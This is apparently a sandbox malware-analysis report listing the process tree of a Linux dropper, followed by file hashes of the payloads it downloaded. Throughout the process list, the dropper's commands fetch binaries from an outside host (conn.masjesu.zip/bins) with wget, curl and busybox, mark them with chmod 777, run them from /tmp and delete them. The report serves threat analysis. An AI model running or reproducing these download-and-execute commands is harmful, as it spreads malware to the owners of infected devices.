/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:941
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:943
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Writes file to tmp directory
PID:948
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:971
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:972
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:973
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:974
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:979
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:980
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:981
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:986
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:987
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:988
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Writes file to tmp directory
PID:989
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:993
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:994
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Reads runtime system information
PID:995
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:998
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:1004
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:1005
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129KB
MD552f72bcf31899453b40d37a7cbf55f35
SHA16dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967
-
Filesize
95KB
MD5c20c610e14b8e59f5f8258a55fe7f27d
SHA1e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
-
Filesize
129KB
MD554bec959d900ad930dc662f8092da57d
SHA19ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
-
Filesize
108KB
MD5c97a9c55ddb153e8bfce38f201d2cffb
SHA13970452f27327f98c2e3fdcabf0390067b48bd62
SHA256138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA5121734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
16B
MD57689ca8c5bc85cf6b78ef89323d4df6a
SHA1a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA25617dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA51240f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471
-
Filesize
80KB
MD522c527269cbd9b42f4ade79f52757efb
SHA1c2456188a49af93b0d07af2a7cc1346d5be510bd
SHA256100042d7138b4348a13c54c191d501d125b7fea7631382e7d0e9d7251057ce97
SHA5127b7cb4d8307c0437163cdbfa349f1285cfa26c25ec856f8b4d4cebf8f71cae87e74de8f3c0f29ef2789168a4499bfe95007d7d524ed734e3eb4ac0d0e4e09b53
-
Filesize
84KB
MD564ece99ca4ab1c1405f5a3335d64a960
SHA1b7395f2320a5bdadb78943b268708965cdbd1d74
SHA256aaf14287d7a971d4541527262e85e5930bbb7f506cff4808d712843be9f05dae
SHA512bc169075e50ceffd0ce0cc90513bc2f0d8696c01d4132609e31c782ea6c0a755505891e2e23676dd63c3dd00bf97599a9a7e6230e8c3f5166202f5b9be606d41
-
Filesize
93KB
MD527a1a1941f224eff6a4babf2495e3692
SHA186fae66a698f6280353e470ffadfb64441b03e83
SHA256ab610b9f57ce293287cf9d4b3d47024ee73c81d8542247e26d1f0db2d5144179
SHA512cf02927d9313f43ab5d04c7570b71cd722a5772642eac72feccdf4612985e29b399a7bbdff5de65d352b92f168c6934b0f0851a28c58a4814fffe38a0d884934
-
Filesize
210B
MD5206f9e1854d7b3f37ac18a899b24c6e2
SHA18be8bfdc06a43dbdbdbfdf1931832d55cf2b8b07
SHA2561547dd7dfd423f9e7bb930fc750e02d38a3e87f2722fc89cb06350431e893559
SHA5120dfd8a386feda7c8fdfcd1674c5f39cf9079b4bf674a35c7dc5394de7b48a92c014f2d6326257a3a685e07246d8613798fbfbe9bb770fb1cba13e90f8a2d3f77